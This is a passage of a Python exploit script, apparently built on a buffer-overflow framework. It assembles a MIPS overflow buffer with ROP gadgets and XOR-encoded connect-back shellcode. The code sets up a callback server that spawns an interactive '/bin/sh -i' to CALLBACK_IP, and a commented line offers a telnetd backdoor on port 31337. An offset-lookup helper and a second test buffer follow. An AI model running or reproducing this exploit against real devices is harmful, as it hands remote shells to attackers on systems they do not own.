buf.add_rop_gadget(0x427a4, description="stackfinder.")


# A single ConnectbackHost can be instantiated and passed to both the
# server and the payload below.
connectback_host = ConnectbackHost(CALLBACK_IP)  # default port is 8080
connectback_server = ConnectbackServer(
    connectback_host,
    startcmd="/bin/sh -i",
)

#Or non-interactive exploitation:
#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False)

payload = CallbackPayload(connectback_host, LittleEndian)

# `badchars` is assigned earlier in the file (outside this section).
encoded_payload = MipsXorEncoder(payload, LittleEndian, badchars=badchars)

# Pad the buffer out to offset 700, then append the encoded payload.
buf.add_pattern(700 - buf.len())
buf.add_string(
    encoded_payload.shellcode,
    description="encoded connect back payload",
)




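# Offset-lookup mode: with exactly one command-line argument, report where
# that string lands in the overflow buffer and exit without doing anything
# else. Both messages used to reference `search_string`, which is never
# assigned, so either branch raised NameError; they now use `search_value`.
# print(...) with a single argument is valid in both Python 2 and 3.
if len(sys.argv) == 2:
    search_value = sys.argv[1]
    offset = buf.find_offset(search_value)
    # A negative return is treated as "not found".
    if offset < 0:
        print("Couldn't find string %s in the overflow buffer." % search_value)
    else:
        print("Found string %s at\noffset: %d" % (search_value, offset))
    sys.exit(0)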


# Placeholder; nothing in this section assigns a real process id to it.
pid = None
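logger.LOG_INFO("Offset of \"u3Au4\": %d" % buf.find_offset("u3Au4"))


logger.LOG_INFO("Creating second empty overflow buffer")

# Second buffer is big-endian and forbids 'A', 'B' and '6'. The try/except
# around every step below suggests that a rejected section is an expected
# outcome here: each failure is logged and the script carries on.
buf2 = EmptyOverflowBuffer(BigEndian, badchars=['A', 'B', '6'])


def _add_section(build):
    """Run one buffer-building call, logging instead of raising on failure.

    Args:
        build: zero-argument callable that appends a section to a buffer.
            It runs inside the try block so that argument evaluation
            (e.g. the buf2.len() call below) is covered by the same handler,
            exactly as in the original inline try/except blocks.
    """
    try:
        build()
    except Exception as e:
        logger.LOG_WARN("Failed to add section.")
        logger.LOG_WARN(str(e))


_add_section(lambda: buf2.add_pattern(128))
_add_section(lambda: buf2.add_string('A' * 128))
_add_section(lambda: buf2.add_rop_gadget(0x4dc46fa0))
_add_section(lambda: buf2.add_pattern(1024 - buf2.len()))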